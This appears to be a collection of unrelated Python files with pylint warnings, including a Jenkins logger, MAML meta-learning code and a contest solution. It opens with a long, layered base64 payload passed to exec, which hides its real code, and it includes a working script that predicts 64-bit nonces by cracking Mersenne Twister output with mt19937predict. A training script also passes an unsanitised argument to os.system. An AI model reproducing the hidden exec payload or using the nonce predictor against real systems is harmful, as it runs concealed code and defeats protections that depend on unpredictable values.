jFLVlZKc1VtRlNla1pNVmxkemVGSnRVa1pqUlRWVFZrWldOVlpxU2pCaE1WcHpZak5vV0dFeWFIQlZNRnBMWVVaYVYxVnJUbFZTYlZJd1ZHeFdNR0V5U2xaalJsWldWbnBGZDFZeWVHdFNNVTUxVkcxR1UxWXhTalpYYTFaaFpERmFSMUp1VmxKaVYzaFpWV3hXZG1WV1pGVlRWRVpXWWtjNU5Ga3dWbTlWTWtaeVUyMW9WMDFHY0V4YVJFWnpZekZ3UjFkc1ZtaE5SRlYzVmtkNGIxbFhSWGxXYkZwVFZrWmFWVlpzWkZOV1JteFdXa1pPVkZKc2NIaFZWekZ2VmpKV2NsZHVjRmRTVjA0elZGWmtVMlJHVm5GV2JVWk9UVVZ3UjFac1dtOVJNbEp6WWtoR1ZXSkhVbk5XYkdRMFVteFNWbHBIZEdoV01IQldXVlJPZDFaV1NqWlNibHBoVW5wR1ZGWXhXazlXYXpWV1ZXMXNWMUpXYjNwV01XTjNUVlpaZDAxVlpHcFNiRXBUVm10a05GTXhWblZqUm1ST1lraENTbGxZY0VkaE1VbDNWMnhzVldKR1NraFpWRVpLWlVaYWNrOVdTazVoYTFwVlYxWldhMVl4V2tkU2JGWnBVbGhDVkZwWGVGcGxWbVJ5WVVoS1RsWXdWalJaYTFwellVVXhSVlpyVmxwaVJrcElWRmQ0YzJSRk5WZFViV3hPVWpOb1IxWkdWbXRoTWtaWVUyeFdhRTB6UWxaVmJuQkRUa1p3U0UxVmRHdFdiRm93VkRGV1YxWnNaRVpTV0doWFRXNW9jbFZxU2xkV2JVcEdWbXMxVTAxc1NuZFhWM2hUWTIxV2MxVnJhRTlYUlRWd1ZXMHhORmRzVlhoV1ZFWlRVbTVCTWxWWGREUldSbVJJWlVVNVdsWXpVbnBVYkZwVFYwZE9SbU5IZUZkV1JWbzBWbFJHYjJNeFVuUlNia3BwVWtaYVZsWnNVbGRTVm14MFkzcEdUbUpIVWxaVk1qVjNXVlV4VmxOc1ZsWldlbFl6V1ZaVmVHTnJOVmxpUm1ocFVqSm9WRmRyV210VWJWWldUMVpvYWxJeWFFOVphMXB6VFRGV05sRnRPVlZOYkVwNldWUk9jMkV4U1hwaFNFcFdWMGhDV0ZWVVJsZGtSMUkyVm14U2FWSnJjRFZXYlRFMFZqRlNWMUpZWkZSaGJIQmhXVmQwZDFWR2EzbGxTR1JZVm14YVdsWnRlR0ZVYkVwSVpVVmFWMWRJUWtkVWJGcExWakZPV1dGR1VtaE5TRUpYVm14U1MwMUdVWGhTV0d4T1ZsaFNVRlpxUmt0VFZscDBUbGhrVkdKRmNFWlZWekF4VjJzeGNWSnJhR0ZTYkhBelZUQlZOVmRXVm5KTlYyeFRVak5STUZZeFVrcGxSa2w1Vld4a2FsSlhhRkZXTUZwTFZGWldjbFpzV210TlZrWTBWbGQwUzJGc1NsZFRiRTVhWVd0d00xVXlNVmRXYXpGWlVteFNXRkl6YUZCWFZtUXdZekExVjFWc2FHcFNXRUp6Vm14U1IyVkdWbkpYYTJScllrWktlVlpITlZOVlJtUkpVV3MxV21KWVRYZFVWbHB6VG14U2MxUnRiRk5OU0VKV1ZqSndTMk14WkhKTldGWm9VMFUxV1ZadE1XOVRNV3hYVm1wQ1ZtRjZSa2RhUldSelZHc3hSVkpZYUZoWFNFSlFXWHBLVjJSR1ZuSmhSbVJwWWtWd1RsWldVa05rTWxKSFlrWmtZVkl6VW5GVVZtaERWMnhhVjFwSGRGWk5WWEJZVlRKd1MxZHJNSGxsUlZKV1ZucEdWRlV4V2xka1IwWkhZMFUxYVdGNlZqTldXSEJIVW0xUmVGUlliRlZoTW5oVldXMTBTMk5HYkhSbFJXUlZUVlZXTlZSc1ZrOWlSbGwzVjJ4c1ZXSkdTa1JWTW5oR1pESk9SbFJ0UmxOaVYyaFZWMWR3UzFOdFZuTlViR2hoVWxoQ1UxUlZWbFpsVmxWNFZteGtWazFXUmpOWmExWmhWR3hhY2xOc1VsWmlWRUV4V1RCYVMxSXhTblZhUjNST1lYcFZkMWRY
ZEc5V01rVjRVbGhrVTJKclNsaFVWbVJPVFZaU1YxWnVUbE5OVmxwNFZXMTRkMkZXV25OWGJsWlhVa1Z3ZWxWVVJrdFdNVloxVVd4S2FHVnNXbGRXUmxaaFV6SkdSMVJzYUZwTk1sSlZWRmR6TVZOc1ZYbE9WVTVvVmpCd2VsVnRNREZXUmxsNlZXMW9XbFpXY0hsYVZscGhaRWRLU0dKRk5XaGlXR2N4VmxSR1YxVXlVWGhYYTJScFVtMW9WMVpxU2xOV01WSldWbTVPYVdKRk5WbFhWRTVyVmtVeGNrNVZjRlpOYWxaRVdWWmtTMk14U25KUFZrcE9ZV3RhTmxkclVrTmpNVXBXVFZWb1lWSXpRbkJXYkZwelRteFpkMVZyZEdwTmJFcFpWa2QwYzFZeVJuSlRhekZXVmtWS00xVjZSbUZXYkZKeVZHeGtWMkpZYUdGV1ZFbDNUVlpzVjFwRlpGTmlWRlpXVkZjeE5GRXhiRmRXYWtKV1lYcEdSMXBGWkhkVk1sWjBaSHBHV0dFeFdsQlZWM00xVm0xS1JtRkhiRlJTYkhCNFZsUkNZVmR0VVhoVVdHUlZZVE5TVjFacVFuTk9iRlY1WTBWT1ZHSkZWak5WYlRBeFZrWmFWazVWVGxoaGEwcDZWV3hrU21WV2NFWmpSMmhYVFRGS1VWWldVa3RoYlZGNFZGaHNWRmRJUWxaV01GcGhZMVpTVlZOcVVrOWlTRUpIVjJ0YWEyRXhTbGxWYTFaV1RXcEdNMWxXV2twbFJtUjBUMVp3VG1KWWFFeFhWRUpYVlRGV2RGUnJiRmhpV0VKelZtdGFXazFzWkhOWGJUbFZUVVJHU0Zrd1dtOVViRW8yWWtWMFdtSkdjRE5hUkVaclkxWk9jVlZ0YkZOTlZYQkdWbFprTUZNeVJYaFVhMlJVWWxSc1dWWnJWbmRPYkdSeFVteGFiR0pHV2pCWlZXUjNZVmRLUm1ORVRsaFdla0kwV1ZjeFIxWnRVa2RUYXpWVFYwWktlRlpVUWxka01sRjRZa2hTVDFacmNHaFVWV1EwWld4c05sTnRkRlJpUlZZelZXMHdNVlpHV2xaT1ZVNVlZV3RLZWxWcldrZFhSbkJHWTBaS1RsSldjREZXVkVaWFZERkdjMkl6WkdsU1ZrcFRWbXBLVTFNeFZuUmpSVTVwWWtaS1YxWkhlR0ZaVlRGSVpVaFdWVlpXV1hkWlZFWktaVmRXUlZGc2FHbFNWRUkwVjJ4amVGTXhUa2RYYmxKc1VqTkNVMVJYTVU5T1JsWTJVbXRhYTAxVk1UVldSM1J6VmtkS2NsTnVRbHBpV0doSVdXMTRUMWRIVmtsalJrSlhZVEJ3VjFaR1ZsTmpNVlpYVmxoa1UySlVWbFZXYkZVeFVURmtjVkZ1VGxOU2ExcFpWMnRXZDFWck1VWlhibFpXVFZaYVVGVlhlSFprTWtwR1drVTFVMDFzU2xCWFZtUTBWakpOZUZSc2FGcE5NbEpWVkZkNFMxTldiSEpoUms1YVZteFpNbFp0Y0dGWGJVVjVWV3hvV21FeVVsQlZhMXAzVG14S2NtVkdXbGRTVlhCT1ZqRlNRMkl4VFhsVWEyaFVZbXhhVjFacVNsTlRNV3h5WVVVMVQxWnNXa2hXVm1oclZVWmFjbE5zV2xWV1ZrcDZWbFphWVZKV1JsVldiRkpYVmxSV1JGWXljRU5qTVVwSFVteG9ZVkpZUWxOVVZWWmhaRlpWZUZac2NHdE5Wemt6Vkd4YVYxVnNXWHBoUlhSWVltNUNSRlpGV25kU2JIQkpWRzEwVTJKclNsWldSM2h2WkRKR1YxTllhRmhpYXpWaFZGVlZNV1JXVWxkV2FrSldZWHBHUjFwRlpIZFdSa3BaVVdwT1dGWjZRWGhXVjNoMlpESktTVlJ0Y0d4aVdHaFRWbTEwVTFGck5WZFdhMlJXVjBkU1VWWnRkRXRXYkZKV1ZXNU9WbFpzY0VaVlZsSlhWbXhLYzFKcVRsaGhhMHA2Vld0YVIxZEdjRVpqUms1b1lUQndNVlpyWXpGa01WcDBVMnRhYVZKNlZrOVZiR2hUWTJ4V2NWTnFVazVTYlZKNlZrWlNSMkpIU2xaalJXeFhZbFJGTUZsWGVFWmxWbXQ2WVVaU1RsWldXWHBXV0hCTFZERk9WMVJ1VmxKaVYzaHdXV3RXWVdSV1ZYaGFSRkpzWVhwc1dGVlhlRmRVYkVwSVpVWktWMkV4U2tOVWJGcFhVakZXV1ZwR1FsZGhNSEJYVmtaV1UyTXhWbGRYYTFaU1ZrWmFWMVZ0ZUVkTk1WRjRWMnRPVjAxRVJrbFhhMVV4VmpGS1ZsZFljRlpOYm1oUVZUSjRVMk5zVW5WV2JGcHBZVEJ3ZDFadGNFZFdNREZYWWtSYVZHRnNTbkJWYlRWRFYyeFdWMWw2VmxWaVZscFpXa1ZWTlZWck1YRldiRUphWVRKU1RGcEdXbGRYUm5CSFVteGFUbEpXYkRaV1YzUmhVakpSZDAxSWJGTmhNbWh3VlRCVk1XRkdXbFZSYTNSWFlrZDBOVlJzV210aFZrcFZZa2hXVlZaV1dYZFZNbmhHWkRGS2RFNVdVbGRXVkZaRlYyeGplRk50VmxkVmJsWlVZWHBHY0ZsWWNGZGxiR1JZVFVob1ZrMUVSa2xWTW5CWFlVWkplV1ZJVGxkTlJuQk1XWHBHY21WdFNrVlViVVpPVTBaS1NsZFhkRzloTVZKWFZHdGFWR0ZyY0dGVVYzQlhWVEZyZDFacVFsWmhla1pIV2tWV2QxVnJNVVpYYmxaV1RWWmFVRlZVU2xkak1rNUhZVVU1VjFKVmNFeFdWM1JUVVRKS2MySkVXbFJpUjFKeVZtcEdTMUpXVmxkaFJYUlVZa1Z3UjFadGN6VlZhekYwWlVWT1dHRnJTbnBWYTFwSFYwWndTR05HVG14aVdHTjRWakowVjFReFJuSlBWbHBwVWxkNFUxbHRlSGRqVm14MFpVVmthV0pGTVRaWmExWkxZa1pLVjFOc1RscGhhM0J5VlRKNFJtUXhTblJPVmxKWFZqSm9SVmRzV210U01XUkdUbFpXVW1FelFsTlVWV2hEVm14WmVXVkhjRTVXVkVaSFdXdFdVMVl5U25WUmEzUldUVVphVEZscVJtdFdWazV4VVcxc1UwMVZjRVpXVm1SM1VUSkdXRlpzV2xOaWF6VmhWRlJLTkZKR1VsWmFSV1JVVm1zMU1WWXlNVEJXTURGelUycEtXR0V4V2xCVlZFcFNaVlpPV1dOR1VtaGhNSEJTVjFaYVlWbFZOWE5VYkdocFVteHdjRlJYYzNoT1ZscDBUbFprYUUxVlZqWlpWV2hyVjJzeFJrNUVRbUZTUlhCTFdsZDRUMk5XUm5KbFJscFhVbFZ3VGxaVVJsZFVNVVp6WWpOa2FWSldTbE5aYlhSTFlVWnNWMVpyZEU1TlYzaDRWa2QwTUZSc1NsaGxSVnBWVmxaS2VsVXllRXRTTWtWNllVWldhVkpyY0ZCV1JsWldUbGRLY2sxVldtdFNXRUpUVkZ
WV1lXUldWWGhXYXpsU1lrYzVNMWxyVm5OVmJVcHpZMGhHV21KWWFFaFpiWGhYVWpGU2NsTnRlRkpOUjNnelZYcEdSazlXUWxSVFdFSk1WVlF3T1VscGEzQWlLU2s9Iikp"))")) | 12 - warning: exec-used
|
1 # your code goes here
2 import collections
3 T = int(input())
4 print (T)
5 while T>0:
6 n,g,m = map(int,input().split())
7 print (n,g,m)
8 dict = collections.defaultdict(set)
9 c = 1 ### guest no.
10 t = 1
11 li = [-1]
12 while c <=g:
13 h,direction = input().split()
14 print (h,direction)
15 h = int(h)
16 #h,direction = astr.split()
17 li.append((h,direction))
18 dict[h].add(c)
19 print (dict)
20 c+=1
21
22 while t<=m:
23 c = 1
24 temp_d = collections.defaultdict(set)
25 while c<=g:
26 h,direction = li[c]
27 h = int(h)
28 if direction == 'C':
29 end = (h+1)%n
30 else:
31 end = (h-1)
32 if end<=0: ####3
33 end = n+end
34 temp_d[end].add(c)
35 c+=1
36 for i,v in temp_d.items():
37 dict[i].union(v)
38 ################
39 t+=1
40
41 dict2 = collections.OrderedDict()
42 for i,v in dict.items():
43 for elem in v:
44 if elem not in dict2:
45 dict2[elem]=1
46 else:
47 dict2[elem]+=1
48 li1 = []
49 print (dict2)
50 for i in range(g+1):
51 if i+1 in dict2:
52 li1.append(dict2[i+1])
53
54 print (li1)
55 T-=1
| 37 - warning: bad-indentation
8 - warning: redefined-builtin
|
1 #!/usr/bin/python3
2 import os
3 main_nonce="nonce"
4 obj_file_new_nonce="obj_new_nonce_624"
5 cmd_cut='cat nonce | tail -312 > obj_nonce_312'
6 nonce_combined_list=[]
7
8 def split_nonce():
9
10 os.system(cmd_cut) #This cuts the last 312 nonces from the main file into obj_nonce_312
11 file_nonce="obj_nonce_312"
12
13 with open(file_nonce, "r") as file: # Calculate hi and lo 32 bit of 64 bit nonce.
14 for line in file.readlines():
15 line=int(line)
16 highint = line >> 32 #hi
17 lowint = line & 0xffffffff #lo
18
19 with open (obj_file_new_nonce, 'a') as file: #Add nonces to a new file making it 624 values.
20 file.write(str(lowint)+'\n')
21
22 with open(obj_file_new_nonce, 'a') as file:
23 file.write(str(highint)+'\n')
24
25
26 def predict():
27 try:
28 os.system('cat obj_new_nonce_624 | mt19937predict | head -20 > obj_pred_10.txt') # Using Kmyk's Mersenne twister Predictor
29 except Exception as e: # This will throw a broken pipe exception but it will still successfully predict the next 10 nonces
30 pass
31
32 with open('obj_pred_10.txt', 'r') as file:
33 nonce_array = file.readlines()
34 for i,j in zip(range(0,len(nonce_array),2), range(129997,130007)):
35 # if i <len(nonce_array)-1:
36 nonce_lo=int(nonce_array[i]) # Converting back to 64 bit.
37 nonce_hi=int(nonce_array[i+1])
38 nonce_combined=(nonce_hi <<32) + nonce_lo
39 hex_nonce=hex(nonce_combined)
40 print("Predicted nonce at",j,"is:", nonce_combined, " [ Hex value:",hex_nonce,"]") #Printing the nonces and their hex values
41
42 split_nonce()
43 predict()
44
45
46
47
48
| 10 - warning: bad-indentation
11 - warning: bad-indentation
13 - warning: bad-indentation
14 - warning: bad-indentation
15 - warning: bad-indentation
16 - warning: bad-indentation
17 - warning: bad-indentation
19 - warning: bad-indentation
20 - warning: bad-indentation
22 - warning: bad-indentation
23 - warning: bad-indentation
27 - warning: bad-indentation
28 - warning: bad-indentation
29 - warning: bad-indentation
30 - warning: bad-indentation
32 - warning: bad-indentation
33 - warning: bad-indentation
34 - warning: bad-indentation
36 - warning: bad-indentation
37 - warning: bad-indentation
38 - warning: bad-indentation
39 - warning: bad-indentation
40 - warning: bad-indentation
13 - warning: unspecified-encoding
19 - warning: unspecified-encoding
22 - warning: unspecified-encoding
29 - warning: broad-exception-caught
32 - warning: unspecified-encoding
29 - warning: unused-variable
|
1 import requests
2 import jenkins
3 from sqlalchemy import *
4 from sqlalchemy.ext.declarative import declarative_base
5 from sqlalchemy.orm import sessionmaker
6 import datetime
7
8 Base = declarative_base()
9
10 def connectToJenkins(url, username, password):
11
12 server = jenkins.Jenkins(url,
13 username=username, password=password)
14 return server
15
16 def initializeDb():
17 engine = create_engine('sqlite:///cli.db', echo=False)
18 session = sessionmaker(bind=engine)()
19 Base.metadata.create_all(engine)
20 return session
21
22 def addJob(session, jlist):
23 for j in jlist:
24 session.add(j)
25 session.commit()
26
27 def getLastJobId(session, name):
28 job = session.query(Jobs).filter_by(name=name).order_by(Jobs.jen_id.desc()).first()
29 if (job != None):
30 return job.jen_id
31 else:
32 return None
33
34 class Jobs(Base):
35 __tablename__ = 'Jobs'
36
37 id = Column(Integer, primary_key = True)
38 jen_id = Column(Integer)
39 name = Column(String)
40 timeStamp = Column(DateTime)
41 result = Column(String)
42 building = Column(String)
43 estimatedDuration = Column(String)
44
45 def createJobList(start, lastBuildNumber, jobName):
46 jList = []
47 for i in range(start + 1, lastBuildNumber + 1):
48 current = server.get_build_info(jobName, i)
49 current_as_jobs = Jobs()
50 current_as_jobs.jen_id = current['id']
51 current_as_jobs.building = current['building']
52 current_as_jobs.estimatedDuration = current['estimatedDuration']
53 current_as_jobs.name = jobName
54 current_as_jobs.result = current['result']
55 current_as_jobs.timeStamp = datetime.datetime.fromtimestamp(long(current['timestamp'])*0.001)
56 jList.append(current_as_jobs)
57 return jList
58
59
60 url = 'http://localhost:8080'
61 username = input('Enter username: ')
62 password = input('Enter password: ')
63 server = connectToJenkins(url, username, password)
64
65 authenticated = false
66 try:
67 server.get_whoami()
68 authenticated = true
69 except jenkins.JenkinsException as e:
70 print ("Authentication error")
71 authenticated = false
72
73 if authenticated:
74 session = initializeDb()
75
76 # get a list of all jobs
77 jobs = server.get_all_jobs()
78 for j in jobs:
79 jobName = j['name'] # get job name
80 #print jobName
81 lastJobId = getLastJobId(session, jobName) # get last locally stored job of this name
82 lastBuildNumber = server.get_job_info(jobName)['lastBuild']['number'] # get last build number from Jenkins for this job
83
84 # if job not stored, update the db with all entries
85 if lastJobId == None:
86 start = 0
87 # if job exists, update the db with new entries
88 else:
89 start = lastJobId
90
91 # create a list of unadded job objects
92 jlist = createJobList(start, lastBuildNumber, jobName)
93 # add job to db
94 addJob(session, jlist)
| 3 - warning: wildcard-import
10 - warning: redefined-outer-name
10 - warning: redefined-outer-name
10 - warning: redefined-outer-name
12 - warning: redefined-outer-name
18 - warning: redefined-outer-name
17 - error: undefined-variable
22 - warning: redefined-outer-name
22 - warning: redefined-outer-name
23 - warning: redefined-outer-name
27 - warning: redefined-outer-name
29 - refactor: no-else-return
37 - error: undefined-variable
37 - error: undefined-variable
38 - error: undefined-variable
38 - error: undefined-variable
39 - error: undefined-variable
39 - error: undefined-variable
40 - error: undefined-variable
40 - error: undefined-variable
41 - error: undefined-variable
41 - error: undefined-variable
42 - error: undefined-variable
42 - error: undefined-variable
43 - error: undefined-variable
43 - error: undefined-variable
34 - refactor: too-few-public-methods
45 - warning: redefined-outer-name
45 - warning: redefined-outer-name
45 - warning: redefined-outer-name
55 - error: undefined-variable
65 - error: undefined-variable
68 - error: undefined-variable
71 - error: undefined-variable
1 - warning: unused-import
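Several of the undefined-variable errors above come from `false`, `true`, and `long`, none of which exist in Python 3 (`long` was Python 2 only); the rest stem from the sqlalchemy wildcard import hiding where names come from. A small sketch of the corrected spellings, detached from the script:

import datetime

authenticated = False                    # Python's booleans are False/True, not false/true
raw_timestamp_ms = 1625000000000         # Jenkins reports build timestamps in milliseconds
ts = datetime.datetime.fromtimestamp(int(raw_timestamp_ms) * 0.001)  # int(), not Python 2's long()
print(authenticated, ts)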
|
1 from datetime import datetime
2 import os
3 from sys import __excepthook__
4 from time import time
5 from traceback import format_exception
6
7
8 BASE_DIR = os.path.realpath(os.path.dirname(__file__))
9
10 def log_exception(type, value, tb):
11 error = format_exception(type, value, tb)
12 filepath = os.path.join(BASE_DIR, 'error.log')
13 old_text = '\n'
14 if os.path.isfile(filepath):
15 with open(filepath, 'r') as logfile:
16 old_text += logfile.read()
17 timestamp = datetime.fromtimestamp(time()).strftime('%Y-%m-%d %H:%M:%S')
18 line = f'[{timestamp}]\n{("".join(error))}'
19 new_text = line + old_text
20 with open(filepath, 'w+') as logfile:
21 logfile.write(new_text)
22
23 __excepthook__(type, value, tb)
| 10 - warning: redefined-builtin
15 - warning: unspecified-encoding
20 - warning: unspecified-encoding
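A minimal sketch of installing the hook so uncaught exceptions get prepended to `error.log`; the module name `errorlog` is an assumption for illustration:

import sys
import errorlog  # hypothetical name for the module above

sys.excepthook = errorlog.log_exception  # uncaught exceptions are logged, then passed to the default hook
raise RuntimeError("demo failure")       # ends up timestamped at the top of error.log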
|
1 """
2 Command-line argument parsing.
3 """
4
5 import argparse
6 #from functools import partial
7
8 import time
9 import tensorflow as tf
10 import json
11 import os
12
13 def boolean_string(s):
14 if s not in {'False', 'True'}:
15 raise ValueError('Not a valid boolean string')
16 return s == 'True'
17
18 def argument_parser():
19 """
20 Get an argument parser for a training script.
21 """
22 file_time = int(time.time())
23 parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
24 parser.add_argument('--arch', help='name architecture', default="fcn", type=str)
25 parser.add_argument('--seed', help='random seed', default=0, type=int)
26 parser.add_argument('--name', help='name add-on', type=str, default='Model_config-'+str(file_time))
27 parser.add_argument('--dataset', help='data set to evaluate on', type=str, default='Omniglot')
28 parser.add_argument('--data_path', help='path to data folder', type=str, default='/home/')
29 parser.add_argument('--config', help='json config file', type=str, default=None)
30 parser.add_argument('--checkpoint', help='checkpoint directory', default='model_checkpoint')
31 parser.add_argument('--test', help='Testing or Not', action='store_true')
32 parser.add_argument('--testintrain', help='Testing during train or Not', action='store_true')
33 parser.add_argument('--min_classes', help='minimum number of classes for n-way', default=2, type=int)
34 parser.add_argument('--max_classes', help='maximum (excluded) number of classes for n-way', default=2, type=int)
35 parser.add_argument('--ttrain_shots', help='number of examples per class in meta train', default=5, type=int)
36 parser.add_argument('--ttest_shots', help='number of examples per class in meta test', default=15, type=int)
37 parser.add_argument('--etrain_shots', help='number of examples per class in meta train', default=5, type=int)
38 parser.add_argument('--etest_shots', help='number of examples per class in meta test', default=15, type=int)
39 parser.add_argument('--train_inner_K', help='number of inner gradient steps during meta training', default=5, type=int)
40 parser.add_argument('--test_inner_K', help='number of inner gradient steps during meta testing', default=5, type=int)
41 parser.add_argument('--learning_rate', help='Adam step size for inner training', default=0.4, type=float)
42 parser.add_argument('--meta_step', help='meta-training step size', default=0.01, type=float)
43 parser.add_argument('--meta_batch', help='meta-training batch size', default=1, type=int)
44 parser.add_argument('--meta_iters', help='meta-training iterations', default=70001, type=int)
45 parser.add_argument('--eval_iters', help='meta-training iterations', default=2000, type=int)
46 parser.add_argument('--step', help='Checkpoint step to load', default=59999, type=float)
47 # python main_emb.py --meta_step 0.005 --meta_batch 8 --learning_rate 0.3 --test --checkpoint Model_config-1568818723
48
49 args = vars(parser.parse_args())
50 #os.system("mkdir -p " + args['checkpoint'])
51 if args['config'] is None:
52 args['config'] = f"{args['checkpoint']}/{args['name']}/{args['name']}.json"
53 print(args['config'])
54 # os.system("mkdir -p " + f"{args['checkpoint']}")
55 os.system("mkdir -p " + f"{args['checkpoint']}/{args['name']}")
56 with open(args['config'], 'w') as write_file:
57 print("Json Dumping...")
58 json.dump(args, write_file)
59 else:
60 with open(args['config'], 'r') as open_file:
61 args = json.load(open_file)
62 return parser
63
64 def train_kwargs(parsed_args):
65 """
66 Build kwargs for the train() function from the parsed
67 command-line arguments.
68 """
69 return {
70 'min_classes': parsed_args.min_classes,
71 'max_classes': parsed_args.max_classes,
72 'train_shots': parsed_args.ttrain_shots,
73 'test_shots': parsed_args.ttest_shots,
74 'meta_batch': parsed_args.meta_batch,
75 'meta_iters': parsed_args.meta_iters,
76 'test_iters': parsed_args.eval_iters,
77 'train_step' : parsed_args.step,
78 'name': parsed_args.name,
79
80 }
81
82 def test_kwargs(parsed_args):
83 """
84 Build kwargs for the train() function from the parsed
85 command-line arguments.
86 """
87 return {
88 'eval_step' : parsed_args.step,
89 'min_classes': parsed_args.min_classes,
90 'max_classes': parsed_args.max_classes,
91 'train_shots': parsed_args.etrain_shots,
92 'test_shots': parsed_args.etest_shots,
93 'meta_batch': parsed_args.meta_batch,
94 'meta_iters': parsed_args.eval_iters,
95 'name': parsed_args.name,
96
97 } | 56 - warning: unspecified-encoding
60 - warning: unspecified-encoding
9 - warning: unused-import
|
1 # ADAPTED BY Rafael Rego Drumond and Lukas Brinkmeyer
2 # THIS IMPLEMENTATION USES THE CODE FROM: https://github.com/dragen1860/MAML-TensorFlow
3
4 import os
5 import numpy as np
6 import tensorflow as tf
7 from archs.maml import MAML
8 class Model(MAML):
9 def __init__(self,train_lr,meta_lr,image_shape,isMIN, label_size=2):
10 super().__init__(train_lr,meta_lr,image_shape,isMIN,label_size)
11
12 def dense_weights(self):
13 weights = {}
14 cells = {}
15 initializer = tf.contrib.layers.xavier_initializer()
16 print("Creating/loading Weights")
17 divider = 1
18 inic = 1
19 filters = 64
20 finals = 64
21 if self.isMIN:
22 divider = 2
23 inic = 3
24 finals = 800
25 filters = 32
26 with tf.variable_scope('MAML', reuse= tf.AUTO_REUSE):
27 weights['c_1'] = tf.get_variable('c_1', shape=(3,3, inic,filters), initializer=initializer)
28 weights['c_2'] = tf.get_variable('c_2', shape=(3,3,filters,filters), initializer=initializer)
29 weights['c_3'] = tf.get_variable('c_3', shape=(3,3,filters,filters), initializer=initializer)
30 weights['c_4'] = tf.get_variable('c_4', shape=(3,3,filters,filters), initializer=initializer)
31 weights['cb_1'] = tf.get_variable('cb_1', shape=(filters), initializer=tf.initializers.constant)
32 weights['cb_2'] = tf.get_variable('cb_2', shape=(filters), initializer=tf.initializers.constant)
33 weights['cb_3'] = tf.get_variable('cb_3', shape=(filters), initializer=tf.initializers.constant)
34 weights['cb_4'] = tf.get_variable('cb_4', shape=(filters), initializer=tf.initializers.constant)
35 weights['d_1'] = tf.get_variable('d_1w', [finals,self.label_size], initializer = initializer)
36 weights['b_1'] = tf.get_variable('d_1b', [self.label_size], initializer=tf.initializers.constant)
37
38 """weights['mean'] = tf.get_variable('mean', [64], initializer=tf.zeros_initializer())
39 weights['variance'] = tf.get_variable('variance',[64], initializer=tf.ones_initializer() )
40 weights['offset'] = tf.get_variable('offset', [64], initializer=tf.zeros_initializer())
41 weights['scale'] = tf.get_variable('scale', [64], initializer=tf.ones_initializer() )
42
43 weights['mean1'] = tf.get_variable('mean', [64], initializer=tf.zeros_initializer())
44 weights['variance1'] = tf.get_variable('variance',[64], initializer=tf.ones_initializer() )
45 weights['offset1'] = tf.get_variable('offset', [64], initializer=tf.zeros_initializer())
46 weights['scale1'] = tf.get_variable('scale', [64], initializer=tf.ones_initializer() )
47
48 weights['mean2'] = tf.get_variable('mean', [64], initializer=tf.zeros_initializer())
49 weights['variance2'] = tf.get_variable('variance',[64], initializer=tf.ones_initializer() )
50 weights['offset2'] = tf.get_variable('offset', [64], initializer=tf.zeros_initializer())
51 weights['scale2'] = tf.get_variable('scale', [64], initializer=tf.ones_initializer() )
52
53 weights['mean3'] = tf.get_variable('mean', [64], initializer=tf.zeros_initializer())
54 weights['variance3'] = tf.get_variable('variance',[64], initializer=tf.ones_initializer() )
55 weights['offset3'] = tf.get_variable('offset', [64], initializer=tf.zeros_initializer())
56 weights['scale3'] = tf.get_variable('scale', [64], initializer=tf.ones_initializer() )"""
57 print("Done Creating/loading Weights")
58 return weights, cells
59
60 def forward(self,x,weights, training):
61 conv1 = self.conv_layer(x, weights["c_1"],weights["cb_1"],"conv1")
62 conv1 = tf.layers.batch_normalization(conv1, name="bn1", reuse=tf.AUTO_REUSE)
63 conv1 = tf.nn.relu(conv1)
64 conv1 = tf.layers.MaxPooling2D(2,2)(conv1)
65
66 conv2 = self.conv_layer(conv1,weights["c_2"],weights["cb_2"],"conv2")
67 conv2 = tf.layers.batch_normalization(conv2, name="bn2", reuse=tf.AUTO_REUSE)
68 conv2 = tf.nn.relu(conv2)
69 conv2 = tf.layers.MaxPooling2D(2,2)(conv2)
70
71 conv3 = self.conv_layer(conv2,weights["c_3"],weights["cb_3"],"conv3")
72 conv3 = tf.layers.batch_normalization(conv3, name="bn3", reuse=tf.AUTO_REUSE)
73 conv3 = tf.nn.relu(conv3)
74 conv3 = tf.layers.MaxPooling2D(2,2)(conv3)
75
76 conv4 = self.conv_layer(conv3,weights["c_4"],weights["cb_4"],"conv4")
77 conv4 = tf.layers.batch_normalization(conv4, name="bn4", reuse=tf.AUTO_REUSE)
78 conv4 = tf.nn.relu(conv4)
79 conv4 = tf.layers.MaxPooling2D(2,2)(conv4)
80 # print(conv4)
81 # bn = tf.squeeze(conv4,axis=(1,2))
82 bn = tf.layers.Flatten()(conv4)
83 # tf.reshape(bn, [3244,234])
84
85 fc1 = self.fc_layer(bn,"dense1",weights["d_1"],weights["b_1"])
86 # bn = tf.reshape(bn,[-1,])
87 return fc1 | 9 - warning: useless-parent-delegation
9 - refactor: too-many-arguments
9 - refactor: too-many-positional-arguments
38 - warning: pointless-string-statement
17 - warning: unused-variable
60 - warning: unused-argument
4 - warning: unused-import
5 - warning: unused-import
|
1 import numpy as np
2 import tensorflow as tf
3 from data_gen.omni_gen import unison_shuffled_copies,OmniChar_Gen, MiniImgNet_Gen
4
5 def test(m, data_sampler,
6 eval_step,
7 min_classes,
8 max_classes,
9 train_shots,
10 test_shots,
11 meta_batch,
12 meta_iters,
13 name):
14
15 sess = tf.Session()
16 sess.run(tf.global_variables_initializer())
17 losses=[]
18
19 temp_yp = []
20 aps = []
21 buffer = []
22 lossesB=[]
23
24 train_gen = data_sampler.sample_Task(meta_batch,min_classes,max_classes+1,train_shots,test_shots,"test")
25 print("TEST MODE")
26 m.loadWeights(sess, name, step = str(int(eval_step)), model_name=name+".ckpt")
27 for i in range(meta_iters):
28 xb1,yb1,xb2,yb2 = next(train_gen)
29 num_l = [len(np.unique(np.argmax(yb1,axis=-1)))]
30
31 if m.maml_n == 2:
32 sess.run(m.init_assign, feed_dict={m.label_n:[5]})
33 l,vals,ps=sess.run([m.test_train_loss,m.test_val_losses,m.val_predictions],feed_dict={m.train_xb: xb1,
34 m.train_yb: yb1,
35 m.val_xb:xb2,
36 m.val_yb:yb2,
37 m.label_n:num_l})
38
39 losses.append(vals)
40 lossesB.append(vals)
41 buffer.append(l)
42
43 true_vals = np.argmax(yb2,axis=-1)
44 all_accs = []
45 for pred_epoch in range(len(ps)):
46 all_accs.append(np.mean(np.argmax(ps[pred_epoch],axis=-1)==true_vals))
47 temp_yp.append(all_accs)
48
49
50 # if i%1==0:
51 if i%50==0:
52 print(f"({i}/{meta_iters})")
53 print(f"Final: TLoss {np.mean(buffer)}, VLoss {np.mean(lossesB,axis=0)}", f"Accuracy {np.mean(temp_yp,axis=0)}" )
